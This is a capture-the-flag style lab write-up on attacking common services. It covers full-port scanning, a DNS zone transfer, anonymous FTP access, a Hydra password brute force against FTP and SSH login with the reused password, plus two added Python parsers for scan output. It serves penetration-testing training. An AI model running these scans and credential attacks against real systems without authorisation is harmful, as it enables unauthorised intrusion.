Attacking Common Services - Medium

Hints:

1- Find 6 open ports.

2- Utilize default credentials to log in to a service and obtain a file containing passwords.

3- Perform a brute-force attack on a service using the compromised file.

4- Utilize these credentials to retrieve the flag.

Initially I ran Nmap without scanning all ports and found nothing of interest. As usual, when the initial scan yields nothing significant it is worth scanning all 65535 ports, so I used Rustscan for a quick full-range sweep. Rustscan is fast but not always complete (here it reported only four of the six open ports; compare the Nmap results further down), so it is best to complement it with an Nmap scan for thoroughness.

 rustscan -a 10.129.201.127 --range 1-65535
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.129.201.127:22
Open 10.129.201.127:53
Open 10.129.201.127:110
Open 10.129.201.127:30021

Now I will scan all ports with Nmap. I recommend the following arguments for a fast yet accurate full-port scan: -p- covers every port, --min-rate drives the packet rate, -Pn skips host discovery (useful when ICMP is filtered), -sS is a SYN scan, and --stats-every prints progress so a long scan does not look stalled.

sudo nmap -p- --min-rate 20000 --stats-every 50s 10.129.106.78 -sS -vvv -Pn -
Completed SYN Stealth Scan at 09:57, 27.95s elapsed (65535 total ports)
Nmap scan report for 10.129.106.78
Host is up, received user-set (7.9s latency).
Scanned at 2024-04-04 09:56:50 EDT for 28s
Not shown: 45157 filtered tcp ports (no-response), 20372 closed tcp ports (reset)
PORT      STATE SERVICE     REASON
22/tcp    open  ssh         syn-ack ttl 63
53/tcp    open  domain      syn-ack ttl 63
110/tcp   open  pop3        syn-ack ttl 63
995/tcp   open  pop3s       syn-ack ttl 63
2121/tcp  open  ccproxy-ftp syn-ack ttl 63
30021/tcp open  unknown     syn-ack ttl 63
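To make the "fast scanner first, then confirm with Nmap" point concrete, here is an added example (not part of the original write-up) that parses both tools' output and reports which open ports one of them missed. The two scan excerpts are copied from this page and embedded inline so the script runs offline; the target IP and port list are therefore the page's own, not assumptions.

```python
"""Reconcile open-port lists from RustScan and Nmap.

Added example, not from the original write-up. The scan outputs below are
the ones shown on the page, embedded inline (constructed sample) so the
script runs without touching the network.
"""
from __future__ import annotations

import re

# Constructed sample: the RustScan "Open" lines from the write-up.
RUSTSCAN_OUTPUT = """\
[!] Your file limit is very small, which negatively impacts RustScan's speed.
Open 10.129.201.127:22
Open 10.129.201.127:53
Open 10.129.201.127:110
Open 10.129.201.127:30021
"""

# Constructed sample: the Nmap port table from the write-up.
NMAP_OUTPUT = """\
PORT      STATE SERVICE     REASON
22/tcp    open  ssh         syn-ack ttl 63
53/tcp    open  domain      syn-ack ttl 63
110/tcp   open  pop3        syn-ack ttl 63
995/tcp   open  pop3s       syn-ack ttl 63
2121/tcp  open  ccproxy-ftp syn-ack ttl 63
30021/tcp open  unknown     syn-ack ttl 63
"""

RUSTSCAN_RE = re.compile(r"^Open\s+(?P<ip>[\d.]+):(?P<port>\d+)\s*$", re.M)
NMAP_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)", re.M
)


def parse_rustscan(text: str) -> set[int]:
    """Return the set of ports RustScan printed as Open."""
    return {int(m.group("port")) for m in RUSTSCAN_RE.finditer(text)}


def parse_nmap(text: str) -> dict[int, str]:
    """Return {port: service} for every TCP port Nmap reports as open."""
    return {
        int(m.group("port")): m.group("service")
        for m in NMAP_RE.finditer(text)
        if m.group("state") == "open" and m.group("proto") == "tcp"
    }


def missed_by(first: set[int], second: set[int]) -> set[int]:
    """Ports present in `second` but absent from `first`."""
    return second - first


def reconcile(rustscan_text: str, nmap_text: str) -> dict:
    """Compare both scans and list what each tool failed to report."""
    rs = parse_rustscan(rustscan_text)
    nm = parse_nmap(nmap_text)
    return {
        "rustscan": sorted(rs),
        "nmap": sorted(nm),
        "missed_by_rustscan": sorted(missed_by(rs, set(nm))),
        "missed_by_nmap": sorted(missed_by(set(nm), rs)),
        "services": nm,
    }


if __name__ == "__main__":
    result = reconcile(RUSTSCAN_OUTPUT, NMAP_OUTPUT)
    for port in sorted(result["services"]):
        tag = " (missed by RustScan)" if port in result["missed_by_rustscan"] else ""
        print(f"{port:>5}/tcp  {result['services'][port]}{tag}")
```

Run against the page's output it flags 995 and 2121 as the ports RustScan dropped, which is exactly why the hint asks for six ports and the quick scan only showed four.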

Let's test whether the DNS server on port 53 allows zone transfers (AXFR) for the inlanefreight.htb domain:

dig AXFR @10.129.201.127 inlanefreight.htb

; <<>> DiG 9.19.17-2~kali1-Kali <<>> AXFR @10.129.201.127 inlanefreight.htb
; (1 server found)
;; global options: +cmd
inlanefreight.htb.      604800  IN      SOA     inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
inlanefreight.htb.      604800  IN      NS      ns.inlanefreight.htb.
app.inlanefreight.htb.  604800  IN      A       10.129.200.5
dc1.inlanefreight.htb.  604800  IN      A       10.129.100.10
dc2.inlanefreight.htb.  604800  IN      A       10.129.200.10
int-ftp.inlanefreight.htb. 604800 IN    A       127.0.0.1
int-nfs.inlanefreight.htb. 604800 IN    A       10.129.200.70
ns.inlanefreight.htb.   604800  IN      A       127.0.0.1
un.inlanefreight.htb.   604800  IN      A       10.129.200.142
ws1.inlanefreight.htb.  604800  IN      A       10.129.200.101
ws2.inlanefreight.htb.  604800  IN      A       10.129.200.102
wsus.inlanefreight.htb. 604800  IN      A       10.129.200.80
inlanefreight.htb.      604800  IN      SOA     inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
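An added example (not from the original write-up) that parses dig's AXFR output into records, tells a successful transfer apart from a refused one, and singles out names whose A record points at a loopback address. Those loopback entries are the interesting part of this zone: int-ftp and ns resolve to 127.0.0.1, so they describe services the server runs for itself. The zone text below is the transfer shown on this page, embedded inline so the script runs offline; the override IP passed to hosts_file_lines is the scanned target and is only an illustration.

```python
"""Parse a dig AXFR transcript and highlight internal hosts.

Added example, not from the original write-up. The zone below is the
transfer shown on the page, embedded inline (constructed sample) so the
script runs offline.
"""
from __future__ import annotations

import ipaddress

AXFR_OUTPUT = """\
; <<>> DiG 9.19.17-2~kali1-Kali <<>> AXFR @10.129.201.127 inlanefreight.htb
; (1 server found)
;; global options: +cmd
inlanefreight.htb.      604800  IN      SOA     inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
inlanefreight.htb.      604800  IN      NS      ns.inlanefreight.htb.
app.inlanefreight.htb.  604800  IN      A       10.129.200.5
dc1.inlanefreight.htb.  604800  IN      A       10.129.100.10
dc2.inlanefreight.htb.  604800  IN      A       10.129.200.10
int-ftp.inlanefreight.htb. 604800 IN    A       127.0.0.1
int-nfs.inlanefreight.htb. 604800 IN    A       10.129.200.70
ns.inlanefreight.htb.   604800  IN      A       127.0.0.1
un.inlanefreight.htb.   604800  IN      A       10.129.200.142
ws1.inlanefreight.htb.  604800  IN      A       10.129.200.101
ws2.inlanefreight.htb.  604800  IN      A       10.129.200.102
wsus.inlanefreight.htb. 604800  IN      A       10.129.200.80
inlanefreight.htb.      604800  IN      SOA     inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
"""


def parse_axfr(text: str) -> list[tuple[str, int, str, str]]:
    """Return (name, ttl, rtype, rdata) tuples, skipping dig's ';' comment lines."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        parts = line.split(None, 4)
        if len(parts) < 5 or parts[2] != "IN":
            continue
        name, ttl, _cls, rtype, rdata = parts
        records.append((name.rstrip("."), int(ttl), rtype, rdata.strip()))
    return records


def zone_is_transferable(text: str) -> bool:
    """A successful AXFR is bracketed by two identical SOA records; a refusal
    shows up as dig's '; Transfer failed.' line with no records at all."""
    if "Transfer failed" in text:
        return False
    soa = [r for r in parse_axfr(text) if r[2] == "SOA"]
    return len(soa) == 2 and soa[0] == soa[-1]


def a_records(records) -> dict[str, str]:
    """Map hostname -> IPv4 address for the zone's A records."""
    return {name: rdata for name, _, rtype, rdata in records if rtype == "A"}


def loopback_hosts(records) -> list[str]:
    """Names whose A record points at 127.0.0.0/8: services the zone
    advertises but that are only meant to be reached from the server itself."""
    return sorted(
        name for name, ip in a_records(records).items()
        if ipaddress.ip_address(ip).is_loopback
    )


def hosts_file_lines(records, override: dict[str, str] | None = None) -> list[str]:
    """Render /etc/hosts lines for the zone; `override` repoints selected
    names (e.g. loopback entries) at the externally reachable target."""
    override = override or {}
    return [
        f"{override.get(name, ip)}\t{name}"
        for name, ip in sorted(a_records(records).items())
    ]


if __name__ == "__main__":
    recs = parse_axfr(AXFR_OUTPUT)
    print("transferable:", zone_is_transferable(AXFR_OUTPUT))
    print("loopback hosts:", loopback_hosts(recs))
    # Illustration only: repoint the internal FTP name at the scanned box.
    for line in hosts_file_lines(recs, {"int-ftp.inlanefreight.htb": "10.129.201.127"}):
        print(line)
```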

The transfer hands us the zone's hostnames. Running AXFR against the discovered subdomains returns nothing further, but two records are worth noting: int-ftp and ns point at 127.0.0.1, i.e. services bound to the server itself, which lines up with the "Internal FTP" ProFTPD instance exposed on the non-standard port 30021. Let's try the default anonymous credentials against that FTP server.

ftp 10.129.201.127 30021
Connected to 10.129.201.127.
220 ProFTPD Server (Internal FTP) [10.129.201.127]
Name (10.129.201.127:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password: 
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||38341|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x   2 ftp      ftp          4096 Apr 18  2022 simon
226 Transfer complete
ftp> cd simon
250 CWD command successful
ftp> dir
229 Entering Extended Passive Mode (|||46356|)
150 Opening ASCII mode data connection for file list
-rw-rw-r--   1 ftp      ftp           153 Apr 18  2022 mynotes.txt
226 Transfer complete
ftp> get mynotes.txt
local: mynotes.txt remote: mynotes.txt
229 Entering Extended Passive Mode (|||20176|)
150 Opening BINARY mode data connection for mynotes.txt (153 bytes)
100% |***********************************************************************|   153        3.09 KiB/s    00:00 ETA
226 Transfer complete
153 bytes received in 00:04 (0.03 KiB/s)
ftp> byte
?Invalid command.
ftp> exit
421 Idle timeout (600 seconds): closing control connection

We obtained mynotes.txt from simon's directory; it contains a list of candidate passwords. We will use it as a wordlist for a brute-force attack against the second FTP server (ProFTPD on port 2121), with simon as the username since the directory name suggests the account.

hydra -l simon -P ./mynotes.txt ftp://10.129.201.127:2121/ -vV
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-04 06:15:56
[DATA] max 8 tasks per 1 server, overall 8 tasks, 8 login tries (l:1/p:8), ~1 try per task
[DATA] attacking ftp://10.129.201.127:2121/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[ATTEMPT] target 10.129.201.127 - login "simon" - pass "234987123948729384293" - 1 of 8 [child 0] (0/0)
[ATTEMPT] target 10.129.201.127 - login "simon" - pass "+23358093845098" - 2 of 8 [child 1] (0/0)
[ATTEMPT] target 10.129.201.127 - login "simon" - pass "ThatsMyBigDog" - 3 of 8 [child 2] (0/0)
[ATTEMPT] target 10.129.201.127 - login "simon" - pass "Rock!ng#May" - 4 of 8 [child 3] (0/0)
[ATTEMPT] target 10.129.201.127 - login "simon" - pass "Puuuuuh7823328" - 5 of 8 [child 4] (0/0)
[ATTEMPT] target 10.129.201.127 - login "simon" - pass "8Ns8j1b!23hs4921smHzwn" - 6 of 8 [child 5] (0/0)
[ATTEMPT] target 10.129.201.127 - login "simon" - pass "237oHs71ohls18H127!!9skaP" - 7 of 8 [child 6] (0/0)
[ATTEMPT] target 10.129.201.127 - login "simon" - pass "238u1xjn1923nZGSb261Bs81" - 8 of 8 [child 7] (0/0)
[STATUS] attack finished for 10.129.201.127 (waiting for children to complete tests)
[2121][ftp] host: 10.129.201.127   login: simon   password: 8Ns8j1b!23hs4921smHzwn
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-04 06:16:18

Hydra found a valid pair: user simon with password 8Ns8j1b!23hs4921smHzwn. Let's connect to the FTP server on port 2121 with this credential.

ftp 10.129.201.127 2121              
Connected to 10.129.201.127.
220 ProFTPD Server (InlaneFTP) [10.129.201.127]
Name (10.129.201.127:kali): simon
331 Password required for simon
Password: 
230 User simon logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||57421|)
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 root     root           29 Apr 20  2022 flag.txt
drwxrwxr-x   3 simon    simon        4096 Apr 18  2022 Maildir
226 Transfer complete
ftp> cd Maildir
250 CWD command successful
ftp> dir
229 Entering Extended Passive Mode (|||64846|)
150 Opening ASCII mode data connection for file list
-rw-rw-r--   1 simon    simon         452 Apr 18  2022 dovecot.list.index.log
-rw-rw-r--   1 simon    simon           8 Apr 18  2022 dovecot-uidvalidity
-r--r--r--   1 simon    simon           0 Apr 18  2022 dovecot-uidvalidity.625dd61f
226 Transfer complete
ftp> bye
221 Goodbye.

We can download flag.txt over FTP (get flag.txt), or, since the same password is reused for the system account, log in over SSH on port 22 as simon:

ssh simon@10.129.201.127
The authenticity of host '10.129.201.127 (10.129.201.127)' can't be established.
ED25519 key fingerprint is SHA256:HfXWue9Dnk+UvRXP6ytrRnXKIRSijm058/zFrj/1LvY.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:16: [hashed name]
    ~/.ssh/known_hosts:18: [hashed name]
    ~/.ssh/known_hosts:19: [hashed name]
    ~/.ssh/known_hosts:20: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.201.127' (ED25519) to the list of known hosts.
simon@10.129.201.127's password: 
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-107-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu 04 Apr 2024 10:19:26 AM UTC

  System load:  0.15               Processes:               222
  Usage of /:   16.7% of 13.72GB   Users logged in:         0
  Memory usage: 12%                IPv4 address for ens160: 10.129.201.127
  Swap usage:   0%

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

No mail.
Last login: Wed Apr 20 14:32:33 2022 from 10.10.14.20
simon@lin-medium:~$ dir
flag.txt  Maildir
